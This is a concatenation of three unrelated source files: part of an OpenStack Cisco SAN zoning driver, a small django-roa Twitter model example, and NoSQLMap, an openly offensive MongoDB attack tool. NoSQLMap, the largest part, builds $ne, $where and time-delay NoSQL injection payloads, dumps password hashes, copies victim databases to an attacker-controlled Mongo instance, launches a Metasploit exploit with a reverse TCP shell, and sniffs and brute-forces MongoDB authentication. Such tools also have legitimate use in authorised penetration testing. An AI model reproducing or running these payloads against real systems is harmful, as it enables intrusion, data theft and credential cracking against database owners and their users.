'cisco_fc_fabric_address')
self.switch_user = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_user')
self.switch_pwd = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_password')
self.switch_port = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_port')
zoning_vsan = self.fabric_configs[fabric_name].safe_get(
'cisco_zoning_vsan')
# Get name server data from fabric and find the targets
# logged in
nsinfo = ''
LOG.debug("show fcns database for vsan %s", zoning_vsan)
nsinfo = self.get_nameserver_info(zoning_vsan)
LOG.debug("Lookup service:fcnsdatabase-%s", nsinfo)
LOG.debug("Lookup service:initiator list from caller-%s",
formatted_initiator_list)
LOG.debug("Lookup service:target list from caller-%s",
formatted_target_list)
visible_targets = filter(lambda x: x in formatted_target_list,
nsinfo)
visible_initiators = filter(lambda x: x in
formatted_initiator_list, nsinfo)
if visible_targets:
LOG.debug("Filtered targets is: %s", visible_targets)
# getting rid of the : before returning
for idx, elem in enumerate(visible_targets):
elem = str(elem).replace(':', '')
visible_targets[idx] = elem
else:
LOG.debug("No targets are in the fcns database"
" for vsan %s", zoning_vsan)
if visible_initiators:
# getting rid of the : before returning ~sk
for idx, elem in enumerate(visible_initiators):
elem = str(elem).replace(':', '')
visible_initiators[idx] = elem
else:
LOG.debug("No initiators are in the fcns database"
" for vsan %s", zoning_vsan)
fabric_map = {'initiator_port_wwn_list': visible_initiators,
'target_port_wwn_list': visible_targets
}
device_map[zoning_vsan] = fabric_map
LOG.debug("Device map for SAN context: %s", device_map)
return device_map
def get_nameserver_info(self, fabric_vsan):
"""Get fcns database info from fabric.
        This method will return the connected node port wwn list (local
        and remote) for the given switch fabric.
"""
cli_output = None
nsinfo_list = []
try:
cmd = ([zone_constant.FCNS_SHOW, fabric_vsan, ' | no-more'])
cli_output = self._get_switch_info(cmd)
except exception.FCSanLookupServiceException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed collecting show fcns database for"
" fabric"))
if cli_output:
nsinfo_list = self._parse_ns_output(cli_output)
LOG.debug("Connector returning fcns info-%s", nsinfo_list)
return nsinfo_list
def _get_switch_info(self, cmd_list):
stdout, stderr, sw_data = None, None, None
try:
stdout, stderr = self._run_ssh(cmd_list, True, 1)
LOG.debug("CLI output from ssh - output:%s", stdout)
if (stdout):
sw_data = stdout.splitlines()
return sw_data
except processutils.ProcessExecutionError as e:
msg = _("Error while getting data via ssh: (command=%(cmd)s "
"error=%(err)s).") % {'cmd': cmd_list,
'err': six.text_type(e)}
LOG.error(msg)
raise exception.CiscoZoningCliException(reason=msg)
def _parse_ns_output(self, switch_data):
"""Parses name server data.
Parses nameserver raw data and adds the device port wwns to the list
:returns list of device port wwn from ns info
"""
nsinfo_list = []
for line in switch_data:
            if " N " not in line:
continue
linesplit = line.split()
if len(linesplit) > 2:
node_port_wwn = linesplit[2]
nsinfo_list.append(node_port_wwn)
else:
msg = _("Malformed fcns output string: %s") % line
LOG.error(msg)
raise exception.InvalidParameterValue(err=msg)
return nsinfo_list
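    def _parse_ns_output_example(self):
        """A minimal sketch with illustrative data (not captured from a real
        switch): only rows whose type column is " N " contribute their third
        column, the port WWN, to the returned list."""
        sample = ["0x470500    N     20:51:00:05:30:00:2a:1e (Cisco)    ipfc"]
        return self._parse_ns_output(sample)  # -> ['20:51:00:05:30:00:2a:1e']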
def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
command = ' '.join(cmd_list)
if not self.sshpool:
self.sshpool = ssh_utils.SSHPool(self.switch_ip,
self.switch_port,
None,
self.switch_user,
self.switch_pwd,
min_size=1,
max_size=5)
last_exception = None
try:
with self.sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
return processutils.ssh_execute(
ssh,
command,
check_exit_code=check_exit_code)
except Exception as e:
msg = _("Exception: %s") % six.text_type(e)
LOG.error(msg)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s") % command)
def _ssh_execute(self, cmd_list, check_exit_code=True, attempts=1):
"""Execute cli with status update.
Executes CLI commands where status return is expected.
cmd_list is a list of commands, where each command is itself
a list of parameters. We use utils.check_ssh_injection to check each
        command, but then join them with " ; " to form a single command.
"""
# Check that each command is secure
for cmd in cmd_list:
utils.check_ssh_injection(cmd)
# Combine into a single command.
command = ' ; '.join(map(lambda x: ' '.join(x), cmd_list))
if not self.sshpool:
self.sshpool = ssh_utils.SSHPool(self.switch_ip,
self.switch_port,
None,
self.switch_user,
self.switch_pwd,
min_size=1,
max_size=5)
stdin, stdout, stderr = None, None, None
LOG.debug("Executing command via ssh: %s" % command)
last_exception = None
try:
with self.sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
stdin, stdout, stderr = ssh.exec_command(command)
greenthread.sleep(random.randint(20, 500) / 100.0)
channel = stdout.channel
exit_status = channel.recv_exit_status()
LOG.debug("Exit Status from ssh:%s", exit_status)
# exit_status == -1 if no exit code was returned
if exit_status != -1:
LOG.debug('Result was %s' % exit_status)
if check_exit_code and exit_status != 0:
raise processutils.ProcessExecutionError(
exit_code=exit_status,
stdout=stdout,
stderr=stderr,
cmd=command)
else:
return True
else:
return True
except Exception as e:
msg = _("Exception: %s") % six.text_type(e)
LOG.error(msg)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
LOG.debug("Handling error case after SSH:%s", last_exception)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception as e:
with excutils.save_and_reraise_exception():
msg = (_("Error executing command via ssh: %s") %
six.text_type(e))
LOG.error(msg)
finally:
if stdin:
stdin.flush()
stdin.close()
if stdout:
stdout.close()
if stderr:
stderr.close()
def cleanup(self):
self.sshpool = None
| apache-2.0 | 1,509,850,864,616,719,000 | 40.622535 | 78 | 0.509204 | false |
bjarnoldus/django-roa | examples/twitter_roa/models.py | 1 | 1274 | from django.db import models
from django_roa import Model, Manager
from django_roa.db.query import RemoteQuerySet
class User(Model):
name = models.CharField(max_length=255)
screen_name = models.CharField(max_length=255)
description = models.TextField()
def __unicode__(self):
return '%s (%s)' % (self.name, self.screen_name)
@staticmethod
def get_resource_url_list():
return 'http://api.twitter.com/1/users/lookup.json?screen_name=twitterapi,twitter,twittersearch,twittermedia,twittermobile'
def get_resource_url_count(self):
return User.get_resource_url_list()
class FakeCountRemoteQuerySet(RemoteQuerySet):
def count(self):
"""
Because trying to count the whole number of tweets is stupid.
"""
return 20
class TweetManager(Manager):
def get_query_set(self):
return FakeCountRemoteQuerySet(self.model)
class Tweet(Model):
text = models.TextField()
source = models.CharField(max_length=50)
user = models.ForeignKey(User)
objects = TweetManager()
def __unicode__(self):
return '%s (%s)' % (self.text, self.id)
@staticmethod
def get_resource_url_list():
return 'http://api.twitter.com/1/statuses/public_timeline.json'
| bsd-3-clause | -4,442,288,461,831,171,000 | 26.106383 | 131 | 0.673469 | false |
cyberpunkych/NoSQLMap | nosqlmap.py | 1 | 27589 | #!/usr/bin/python
#NoSQLMap Copyright 2013 Russell Butturini
#This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
####_sniff_and_brute_####
from scapy.all import *
import re
import hashlib
md5 = hashlib.md5
##############
import sys
import string
import random
import os
import time
import httplib2
import urllib
import pymongo
import subprocess
#Set a list so we can track whether options are set or not to avoid resetting them in subsequent calls to the options menu.
global optionSet
optionSet = [False,False,False,False,False,False]
def mainMenu():
select = True
while select:
os.system('clear')
#label = subprocess.check_output(["git","describe","--always"])
print "NoSQLMap-v0.15"
print "[email protected]"
print "\n"
print "1-Set options (do this first)"
print "2-NoSQL DB Access Attacks"
print "3-NoSQL Web App attacks"
print "4-NoSQL MongoDB sniff and brute password"
print "99-Exit"
select = raw_input("Select an option:")
if select == "1":
options()
##
if select == "4":
sniff_and_brute()
##
elif select == "2":
if optionSet[0] == True:
netAttacks(victim)
#Check minimum required options
else:
raw_input("Target not set! Check options. Press enter to continue...")
mainMenu()
elif select == "3":
#Check minimum required options
if (optionSet[0] == True) and (optionSet[2] == True):
webApps()
else:
raw_input("Options not set! Check Host and URI path. Press enter to continue...")
mainMenu()
elif select == "99":
sys.exit()
else:
raw_input("Invalid Selection. Press enter to continue.")
mainMenu()
def options():
global victim
global webPort
global uri
global httpMethod
global myIP
global myPort
#Set default value if needed
if optionSet[0] == False:
victim = "Not Set"
if optionSet[1] == False:
webPort = 80
optionSet[1] = True
if optionSet[2] == False:
uri = "Not Set"
if optionSet[3] == False:
httpMethod = "GET"
if optionSet[4] == False:
myIP = "Not Set"
if optionSet[5] == False:
myPort = "Not Set"
select = True
while select:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(victim) + ")"
print "2-Set web app port (Current: " + str(webPort) + ")"
print "3-Set App Path (Current: " + str(uri) + ")"
print "4-Set HTTP Request Method (GET/POST)"
print "5-Set my local Mongo/Shell IP (Current: " + str(myIP) + ")"
print "6-Set shell listener port (Current: " + str(myPort) + ")"
print "7-Load options file"
print "8-Save options file"
print "9-Back to main menu"
select = raw_input("Select an option: ")
if select == "1":
victim = raw_input("Enter the host IP/DNS name: ")
print "\nTarget set to " + victim + "\n"
optionSet[0] = True
options()
elif select == "2":
webPort = raw_input("Enter the HTTP port for web apps: ")
print "\nHTTP port set to " + webPort + "\n"
optionSet[1] = True
options()
elif select == "3":
uri = raw_input("Enter URI Path (Press enter for no URI): ")
print "\nURI Path set to " + uri + "\n"
optionSet[2] = True
options()
#NOT IMPLEMENTED YET FOR USE
elif select == "4":
httpMethod = True
while httpMethod:
print "1-Send request as a GET"
print "2-Send request as a POST"
httpMethod = raw_input("Select an option: ")
if httpMethod == "1":
print "GET request set"
optionSet[3] = True
options()
elif httpMethod == "2":
print "POST request set"
optionSet[3] = True
options()
else:
print "Invalid selection"
elif select == "5":
myIP = raw_input("Enter host IP for my Mongo/Shells: ")
print "Shell IP set to " + myIP + "\n"
optionSet[4] = True
options()
elif select == "6":
myPort = raw_input("Enter TCP listener for shells: ")
print "Shell TCP listener set to " + myPort + "\n"
optionSet[5] = True
options()
elif select == "7":
loadPath = raw_input("Enter file name to load: ")
try:
fo = open(loadPath,"r" )
csvOpt = fo.read()
fo.close()
optList = csvOpt.split(",")
victim = optList[0]
webPort = optList[1]
uri = optList[2]
httpMethod = optList[3]
myIP = optList[4]
myPort = optList[5]
#Set option checking array based on what was loaded
x = 0
for item in optList:
if item != "Not Set":
optionSet[x] = True
x += 1
except:
print "Couldn't load options file!"
options()
elif select == "8":
savePath = raw_input("Enter file name to save: ")
try:
fo = open(savePath, "wb")
fo.write(str(victim) + "," + str(webPort) + "," + str(uri) + "," + str(httpMethod) + "," + str(myIP) + "," + str(myPort))
fo.close()
print "Options file saved!"
except:
print "Couldn't save options file."
elif select == "9":
mainMenu()
def netAttacks(target):
mgtOpen = False
webOpen = False
#This is a global for future use with other modules; may change
global dbList
srvNeedCreds = raw_input("Does the database server need credentials? ")
if srvNeedCreds == "n" or srvNeedCreds == "N":
try:
conn = pymongo.MongoClient(target,27017)
print "MongoDB port open on " + target + ":27017!"
mgtOpen = True
except:
print "MongoDB port closed."
elif srvNeedCreds == "y" or srvNeedCreds == "Y":
srvUser = raw_input("Enter server username: ")
srvPass = raw_input("Enter server password: ")
uri = "mongodb://" + srvUser + ":" + srvPass + "@" + victim +"/"
try:
conn = pymongo.MongoClient(uri)
print "MongoDB authenticated on " + target + ":27017!"
mgtOpen = True
except:
raw_input("Failed to authenticate. Press enter to continue...")
mainMenu()
mgtUrl = "http://" + target + ":28017"
#Future rev: Add web management interface parsing
try:
mgtRespCode = urllib.urlopen(mgtUrl).getcode()
if mgtRespCode == 200:
print "MongoDB web management open at " + mgtUrl + ". No authentication required!"
except:
print "MongoDB web management closed or requires authentication."
if mgtOpen == True:
        #This is compiling the server info
print "Server Info:"
serverInfo = conn.server_info()
print serverInfo
print "\n"
try:
print "List of databases:"
dbList = conn.database_names()
print "\n".join(dbList)
print "\n"
except:
print "Error: Couldn't list databases. The provided credentials may not have rights."
print "List of collections:"
#print "\n"
try:
for dbItem in dbList:
db = conn[dbItem]
colls = db.collection_names()
print dbItem + ":"
print "\n".join(colls)
if 'system.users' in colls:
users = list(db.system.users.find())
print "Database Users and Password Hashes:"
#print dbItem
print str(users)
#print "\n"
except:
print "Error: Couldn't list collections. The provided credentials may not have rights."
stealDB = raw_input("Steal a database? (Requires your own Mongo instance): ")
if stealDB == "y" or stealDB == "Y":
stealDBs (myIP)
        getShell = raw_input("Try to get a shell? (Requires MongoDB <2.2.4)?")
if getShell == "y" or getShell == "Y":
#Launch Metasploit exploit
try:
proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(victim) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(myIP) + " LPORT="+ str(myPort) + " E", shell=True)
except:
print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined."
raw_input("Press enter to continue...")
return()
def webApps():
paramName = []
paramValue = []
vulnAddrs = []
possAddrs = []
appUp = False
strTbAttack = False
intTbAttack = False
#Verify app is working.
print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."
appURL = "http://" + str(victim) + ":" + str(webPort) + str(uri)
try:
appRespCode = urllib.urlopen(appURL).getcode()
if appRespCode == 200:
normLength = int(len(urllib.urlopen(appURL).read()))
timeReq = urllib.urlopen(appURL)
start = time.time()
page = timeReq.read()
end = time.time()
timeReq.close()
timeBase = round((end - start), 3)
print "App is up! Got response length of " + str(normLength) + " and response time of " + str(timeBase) + " seconds. Starting injection test.\n"
appUp = True
else:
print "Got " + appRespCode + "from the app, check your options."
except:
print "Looks like the server didn't respond. Check your options."
if appUp == True:
injectSize = raw_input("Baseline test-Enter random string size: ")
injectString = randInjString(int(injectSize))
print "Using " + injectString + " for injection testing.\n"
#Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
    #Add error handling for non-200 HTTP response codes in case the random string freaks out the app.
randomUri = buildUri(appURL,injectString)
print "Checking random injected parameter HTTP response size using " + randomUri +"...\n"
randLength = int(len(urllib.urlopen(randomUri).read()))
print "Got response length of " + str(randLength) + "."
randNormDelta = abs(normLength - randLength)
if randNormDelta == 0:
print "No change in response size injecting a random parameter..\n"
else:
print "HTTP response varied " + str(randNormDelta) + " bytes with random parameter value!\n"
print "Testing Mongo PHP not equals associative array injection using " + neqUri +"..."
injLen = int(len(urllib.urlopen(neqUri).read()))
print "Got response length of " + str(injLen) + "."
randInjDelta = abs(injLen - randLength)
if (randInjDelta >= 100) and (injLen != 0) :
print "Not equals injection response varied " + str(randInjDelta) + " bytes from random parameter value! Injection works!"
vulnAddrs.append(neqUri)
elif (randInjDelta > 0) and (randInjDelta < 100) and (injLen != 0) :
print "Response variance was only " + str(randInjDelta) + " bytes. Injection might have worked but difference is too small to be certain. "
possAddrs.append(neqUri)
elif (randInjDelta == 0):
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(neqUri)
print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n"
print "Injecting " + whereStrUri
whereStrLen = int(len(urllib.urlopen(whereStrUri).read()))
whereStrDelta = abs(whereStrLen - randLength)
if (whereStrDelta >= 100) and (whereStrLen > 0):
print "Java $where escape varied " + str(whereStrDelta) + " bytes from random parameter value! Where injection works!"
vulnAddrs.append(whereStrUri)
elif (whereStrDelta > 0) and (whereStrDelta < 100) and (whereStrLen - randLength > 0):
print " response variance was only " + str(whereStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereStrUri)
elif (whereStrDelta == 0):
print "Random string response size and $where injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereStrUri)
print "\n"
print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n"
print "Injecting " + whereIntUri
whereIntLen = int(len(urllib.urlopen(whereIntUri).read()))
whereIntDelta = abs(whereIntLen - randLength)
if (whereIntDelta >= 100) and (whereIntLen - randLength > 0):
print "Java $where escape varied " + str(whereIntDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(whereIntUri)
elif (whereIntDelta > 0) and (whereIntDelta < 100) and (whereIntLen - randLength > 0):
print " response variance was only " + str(whereIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereIntUri)
elif (whereIntDelta == 0):
print "Random string response size and $where injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereIntUri)
#Start a single record attack in case the app expects only one record back
print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n"
print " Injecting " + whereOneStr
whereOneStrLen = int(len(urllib.urlopen(whereOneStr).read()))
whereOneStrDelta = abs(whereOneStrLen - randLength)
if (whereOneStrDelta >= 100) and (whereOneStrLen - randLength > 0):
print "Java $where escape varied " + str(whereOneStrDelta) + " bytes from random parameter value! Where injection works!"
vulnAddrs.append(whereOneStr)
elif (whereOneStrDelta > 0) and (whereOneStrDelta < 100) and (whereOneStrLen - randLength > 0):
print " response variance was only " + str(whereOneStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereOneStr)
elif (whereOneStrDelta == 0):
print "Random string response size and $where single injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereOneStr)
print "\n"
print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n"
print " Injecting " + whereOneInt
whereOneIntLen = int(len(urllib.urlopen(whereOneInt).read()))
whereOneIntDelta = abs(whereOneIntLen - randLength)
if (whereOneIntDelta >= 100) and (whereOneIntLen - randLength > 0):
print "Java $where escape varied " + str(whereOneIntDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(whereOneInt)
elif (whereOneIntDelta > 0) and (whereOneIntDelta < 100) and (whereOneIntLen - randLength > 0):
print " response variance was only " + str(whereOneIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereOneInt)
elif (whereOneIntDelta == 0):
print "Random string response size and $where single record injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereOneInt)
print "\n"
print "Testing Mongo this not equals string escape attack for all records..."
print " Injecting " + strThisNeqUri
whereThisStrLen = int(len(urllib.urlopen(strThisNeqUri).read()))
whereThisStrDelta = abs(whereThisStrLen - randLength)
if (whereThisStrDelta >= 100) and (whereThisStrLen - randLength > 0):
print "Java this not equals varied " + str(whereThisStrDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(strThisNeqUri)
elif (whereThisStrDelta > 0) and (whereThisStrDelta < 100) and (whereThisStrLen - randLength > 0):
print " response variance was only " + str(whereThisStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(strThisNeqUri)
        elif (whereThisStrDelta == 0):
print "Random string response size and this return response size were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(strThisNeqUri)
print "\n"
print "Testing Mongo this not equals integer escape attack for all records..."
print " Injecting " + intThisNeqUri
whereThisIntLen = int(len(urllib.urlopen(intThisNeqUri).read()))
whereThisIntDelta = abs(whereThisIntLen - randLength)
if (whereThisIntDelta >= 100) and (whereThisIntLen - randLength > 0):
print "Java this not equals varied " + str(whereThisStrDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(intThisNeqUri)
elif (whereThisIntDelta > 0) and (whereThisIntDelta < 100) and (whereThisIntLen - randLength > 0):
print " response variance was only " + str(whereThisIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(intThisNeqUri)
elif (whereThisIntDelta == 0):
print "Random string response size and this return response size were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(intThisNeqUri)
doTimeAttack = raw_input("Start timing based tests?")
if doTimeAttack == "y" or doTimeAttack == "Y":
print "Starting Javascript string escape time based injection..."
start = time.time()
strTimeInj = urllib.urlopen(timeStrUri)
page = strTimeInj.read()
end = time.time()
strTimeInj.close()
#print str(end)
#print str(start)
strTimeDelta = (int(round((end - start), 3)) - timeBase)
#print str(strTimeDelta)
if strTimeDelta > 25:
print "HTTP load time variance was " + str(strTimeDelta) +" seconds! Injection possible."
strTbAttack = True
else:
print "HTTP load time variance was only " + str(strTimeDelta) + ". Injection probably didn't work."
strTbAttack = False
print "Starting Javascript integer escape time based injection..."
start = time.time()
intTimeInj = urllib.urlopen(timeIntUri)
page = intTimeInj.read()
end = time.time()
intTimeInj.close()
#print str(end)
#print str(start)
intTimeDelta = (int(round((end - start), 3)) - timeBase)
#print str(strTimeDelta)
if intTimeDelta > 25:
print "HTTP load time variance was " + str(intTimeDelta) +" seconds! Injection possible."
intTbAttack = True
else:
print "HTTP load time variance was only " + str(intTimeDelta) + "seconds. Injection probably didn't work."
intTbAttack = False
print "\n"
print "Vunerable URLs:"
print "\n".join(vulnAddrs)
print "\n"
print "Possibly vulnerable URLs:"
print"\n".join(possAddrs)
print "\n"
print "Timing based attacks:"
if strTbAttack == True:
print "String attack-Successful"
else:
print "String attack-Unsuccessful"
if intTbAttack == True:
print "Integer attack-Successful"
else:
print "Integer attack-Unsuccessful"
fileOut = raw_input("Save results to file?")
if fileOut == "y" or fileOut == "Y":
savePath = raw_input("Enter output file name: ")
fo = open(savePath, "wb")
fo.write ("Vulnerable URLs:\n")
fo.write("\n".join(vulnAddrs))
fo.write("\n\n")
fo.write("Possibly Vulnerable URLs:\n")
fo.write("\n".join(possAddrs))
fo.write("\n")
fo.write("Timing based attacks:\n")
if strTbAttack == True:
fo.write("String Attack-Successful\n")
else:
fo.write("String Attack-Unsuccessful\n")
fo.write("\n")
if intTbAttack == True:
fo.write("Integer attack-Successful\n")
else:
fo.write("Integer attack-Unsuccessful\n")
fo.write("\n")
fo.close()
raw_input("Press enter to continue...")
return()
def randInjString(size):
print "What format should the random string take?"
print "1-Alphanumeric"
print "2-Letters only"
print "3-Numbers only"
print "4-Email address"
format = raw_input("Select an option: ")
if format == "1":
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(size))
elif format == "2":
chars = string.ascii_letters
return ''.join(random.choice(chars) for x in range(size))
elif format == "3":
chars = string.digits
return ''.join(random.choice(chars) for x in range(size))
elif format == "4":
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(size)) + '@' + ''.join(random.choice(chars) for x in range(size)) + '.com'
def buildUri(origUri, randValue):
paramName = []
paramValue = []
global neqUri
global whereStrUri
global whereIntUri
global whereOneStr
global whereOneInt
global timeStrUri
global timeIntUri
global strThisNeqUri
global intThisNeqUri
injOpt = ""
#Split the string between the path and parameters, and then split each parameter
split_uri = origUri.split("?")
params = split_uri[1].split("&")
for item in params:
index = item.find("=")
paramName.append(item[0:index])
paramValue.append(item[index + 1:len(item)])
menuItem = 1
print "List of parameters:"
for params in paramName:
print str(menuItem) + "-" + params
menuItem += 1
try:
injIndex = raw_input("Which parameter should we inject? ")
injOpt = str(paramName[int(injIndex)-1])
print "Injecting the " + injOpt + " parameter..."
except:
raw_input("Something went wrong. Press enter to return to the main menu...")
mainMenu()
evilUri = split_uri[0] + "?"
neqUri = split_uri[0] + "?"
whereStrUri = split_uri[0] + "?"
whereIntUri = split_uri[0] + "?"
whereOneStr = split_uri[0] + "?"
whereOneInt = split_uri[0] + "?"
timeStrUri = split_uri[0] + "?"
timeIntUri = split_uri[0] + "?"
strThisNeqUri = split_uri[0] + "?"
intThisNeqUri = split_uri[0] + "?"
x = 0
for item in paramName:
if paramName[x] == injOpt:
evilUri += paramName[x] + "=" + randValue + "&"
neqUri += paramName[x] + "[$ne]=" + randValue + "&"
whereStrUri += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
whereIntUri += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
whereOneStr += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
whereOneInt += paramName[x] + "=a; return db.a.findOne(); var dummy=1" + "&"
timeStrUri += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
timeIntUri += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
strThisNeqUri += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
intThisNeqUri += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
else:
evilUri += paramName[x] + "=" + paramValue[x] + "&"
neqUri += paramName[x] + "=" + paramValue[x] + "&"
whereStrUri += paramName[x] + "=" + paramValue[x] + "&"
whereIntUri += paramName[x] + "=" + paramValue[x] + "&"
whereOneStr += paramName[x] + "=" + paramValue[x] + "&"
whereOneInt += paramName[x] + "=" + paramValue[x] + "&"
timeStrUri += paramName[x] + "=" + paramValue[x] + "&"
timeIntUri += paramName[x] + "=" + paramValue[x] + "&"
strThisNeqUri += paramName[x] + "=" + paramValue[x] + "&"
intThisNeqUri += paramName[x] + "=" + paramValue[x] + "&"
x += 1
#Clip the extra & off the end of the URL
evilUri = evilUri[:-1]
neqUri = neqUri[:-1]
whereStrUri = whereStrUri[:-1]
whereIntUri = whereIntUri[:-1]
whereOneStr = whereOneStr[:-1]
whereOneInt = whereOneInt[:-1]
timeStrUri = timeStrUri[:-1]
timeIntUri = timeIntUri[:-1]
return evilUri
def stealDBs(myDB):
menuItem = 1
for dbName in dbList:
print str(menuItem) + "-" + dbName
menuItem += 1
try:
dbLoot = raw_input("Select a database to steal:")
except:
print "Invalid selection."
stealDBs(myDB)
try:
        #Mongo can only pull, not push; connect to my instance and pull from the verified open remote instance.
dbNeedCreds = raw_input("Does this database require credentials? ")
if dbNeedCreds == "n" or dbNeedCreds == "N":
myDBConn = pymongo.MongoClient(myDB,27017)
myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
elif dbNeedCreds == "y" or dbNeedCreds == "Y":
dbUser = raw_input("Enter database username: ")
dbPass = raw_input("Enter database password: ")
            myDBConn = pymongo.MongoClient(myDB,27017)
            myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim,dbUser,dbPass)
else:
raw_input("Invalid Selection. Press enter to continue.")
stealDBs(myDB)
cloneAnother = raw_input("Database cloned. Copy another?")
if cloneAnother == "y" or cloneAnother == "Y":
stealDBs(myDB)
else:
return()
except:
raw_input ("Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return...")
mainMenu()
####__sniff_and_brute__####
###cyber-punk###
def sniff_and_brute():
class sniff_and_brute(object):
def get_packets(self, port, iface, count):
packets = sniff(filter="port "+str(port)+"", count=count, iface=str(iface))
return packets
def parse_packets(self, port, iface, count):
            print "Sniff packets..."
packets = self.get_packets(port, iface, count)
            print "Parse packets..."
for i in xrange(len(packets)):
if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])):
packet=packets[i]
break
user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4]
nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6]
key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8]
return user, nonce, key
def gen_pass(self, user, nonce, passw):
            return md5(nonce + user + md5(user + ":mongo:" + str(passw)).hexdigest()).hexdigest()
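        def gen_pass_example(self):
            #Worked sketch with made-up values: the legacy MongoDB (MONGODB-CR)
            #key is md5(nonce + user + md5(user + ":mongo:" + password)), which
            #is what gen_pass computes and brute_pass compares against the
            #sniffed key.
            return self.gen_pass("admin", "2375531c32080ae8", "secret")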
def brute_pass(self, port, iface, dictionary):
count = 10 # count of packets which should be sniffed
nonce, user, key = self.parse_packets(str(port), str(iface), int(count))
            print "Prepare to brute..."
file = open(dictionary)
file_len = open(dictionary)
for i in xrange(len(file_len.readlines())):
passw = file.readline().split('\n')[0]
if self.gen_pass(user, nonce, passw) == key:
raw_input("\nFound - "+user+":"+passw)
break
exit
def test(self):
self.test1("string")
def test1(self, string):
self.string = string
print string
print "\nSniff and brute mongo password."
start = raw_input("Prepare to start (Y/N)? ")
if start == "y" or start == "Y":
next = raw_input("Port (default 27017): ")
        #raw_input always returns a string, so fall back to the default unless a number was entered
        if not next.isdigit():
            port = 27017
        else:
            port = int(next)
next = raw_input("Interface to sniff: ")
if type(next) != str:
print "Error!"
exit
else:
iface=next
next= raw_input("Full path to dictionary for brute: ")
if type(next) != str:
print "Error!"
exit
else:
dictionary = next
else:
exit
start = raw_input("Start? (Y/N)")
if start == "y" or start == "Y":
sniff_brute = sniff_and_brute()
sniff_brute.brute_pass(port, iface, dictionary)
################
mainMenu()
| gpl-3.0 | 6,197,109,014,494,695,000 | 30.821223 | 209 | 0.662837 | false |
